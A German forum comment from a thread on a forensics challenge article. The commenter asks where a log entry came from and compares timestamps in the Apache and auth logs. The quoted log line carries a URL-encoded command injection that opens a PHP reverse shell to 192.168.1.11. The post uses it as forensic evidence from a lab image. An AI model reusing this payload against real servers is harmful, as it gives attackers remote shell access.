Abo
  1. Foren
  2. Kommentare
  3. Security
  4. Alle Kommentare zum Artikel
  5. › Forensik Challenge: Lust auf eine…

Neues Image online?

  1. Thema

Neues Thema Ansicht wechseln


  1. Neues Image online?

    Autor: digidax 05.04.17 - 11:42

    In welcher Datei wurde der Logeintrag:

    192.168.1.11 - - [23/Nov/2016:10:13:32 +0100] "GET /originalIndex.php?password=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA& file=;%70%68%70%20%2d%72%20%27%24%73%6f%63%6b%3d %66%73%6f%63%6b%6f%70%65%6e%28%22%31%39%32%2e%31 %36%38%2e%31%2e%31%31%22%2c%31%32%33%34%29%3b%65 %78%65%63%28%22%2f%62%69%6e%2f%73%68%20%2d%69%20 %3c%26%33%20%3e%26%33%20%32%3e%26%33%22%29%3b%27 HTTP/1.1" 200 1991 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"

    gefunden? Kann diesen nicht finden.
    Das Apache Access Log wiest einen Eintrag:

    192.168.1.11 - - [24/Nov/2016:09:28:51 +0100] "GET /index.php?password=password&file=hack HTTP/1.1" 200 1999 "http://192.168.1.10/originalIndex.php" "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0"

    auf. Die Datei index.php wurde von der Seite "http://192.168.1.10/originalIndex.php" (Referrer) aus angesprochen. Die "originalIndex.php" konnte es aber um 9:28 Uhr noch gar nicht geben, da laut "auth.log" um 9:44 Uhr der hacker das erste mal root Rechte erhalten hat: "Nov 24 09:44:52 debian su[23027]: Successful su for root by hacker"

Neues Thema Ansicht wechseln


Um zu kommentieren, loggen Sie sich bitte ein oder registrieren Sie sich. Zum Login

Stellenmarkt
  1. Arte G.E.I.E., Straßburg (Frankreich)
  2. über duerenhoff GmbH, Raum Mannheim
  3. Franke Coffee Systems GmbH, Grünsfeld
  4. Bosch Gruppe, Stuttgart

Golem pur
  • Golem.de ohne Werbung nutzen

Anzeige
Spiele-Angebote
  1. 2,49€
  2. 5,99€
  3. 24,99€
  4. 32,95€


Haben wir etwas übersehen?

E-Mail an news@golem.de


Sechs Airpods-Konkurrenten im Test: Apple hat nicht die Längsten
Sechs Airpods-Konkurrenten im Test
Apple hat nicht die Längsten

Nach dem Klangsieger und dem Bedienungssieger haben wir im dritten Test den kabellosen Bluetooth-Hörstöpsel mit der weitaus besten Akkulaufzeit gefunden. Etwas war aber wieder nicht dabei: die perfekten True Wireless In-Ears.
Ein Test von Ingo Pakalski


    Uploadfilter: Der Generalangriff auf das Web 2.0
    Uploadfilter
    Der Generalangriff auf das Web 2.0

    Die EU-Urheberrechtsreform könnte Plattformen mit nutzergenerierten Inhalten stark behindern. Die Verfechter von Uploadfiltern zeigen dabei ein Verständnis des Netzes, das mit der Realität wenig zu tun hat. Statt Lizenzen könnte es einen anderen Ausweg geben.
    Eine Analyse von Friedhelm Greis

    1. Europawahlen Facebook will mit dpa Falschnachrichten bekämpfen
    2. Urheberrecht Europas IT-Firmen und Bibliotheken gegen Uploadfilter
    3. Pauschallizenzen CDU will ihre eigenen Uploadfilter verhindern

    Operation 13: Anonymous wird wieder aktiv
    Operation 13
    Anonymous wird wieder aktiv

    Mehrere Jahre wirkte es, als sei das dezentrale Kollektiv Anonymous in Deutschland eingeschlafen. Doch es bewegt sich etwas, die Aktivisten machen gegen Artikel 13 mobil - auf der Straße wie im Internet.
    Von Anna Biselli


      1. DNS NET: Großes Glasfaserprojekt in Sachsen-Anhalt wird umgesetzt
        DNS NET
        Großes Glasfaserprojekt in Sachsen-Anhalt wird umgesetzt

        Im Landkreis Börde geht das Großprojekt Glasfaserausbau der ARGE Breitband und DNS:NET weiter. Nach Problemen wegen fehlender Tiefbaukapazität wird jetzt ausgebaut.

      2. Huawei: Dorothee Bär verurteilt Anbieter-Blaming bei 5G
        Huawei
        Dorothee Bär verurteilt Anbieter-Blaming bei 5G

        Die Staatsministerin für Digitalisierung steht hinter der Entscheidung der Bundesregierung, alle 5G-Ausrüster gleich zu behandeln. Huawei müsse die gleichen Anforderungen erfüllen wie auch Ericsson und Nokia.

      3. Mobilfunk: Unionsfraktion will staatliche Gesellschaft gegen Funklöcher
        Mobilfunk
        Unionsfraktion will staatliche Gesellschaft gegen Funklöcher

        Die Mobilfunk-Infrastrukturgesellschaft (MIG) soll Standorte in Regionen errichten, in denen entweder keiner der drei Anbieter ein Netz betreibt oder aber nur ein Netz präsent ist. Die Firmen sollen dies nutzen, um Funklöcher zu schließen.


      1. 20:33

      2. 19:04

      3. 18:22

      4. 18:20

      5. 17:26

      6. 16:48

      7. 16:40

      8. 16:38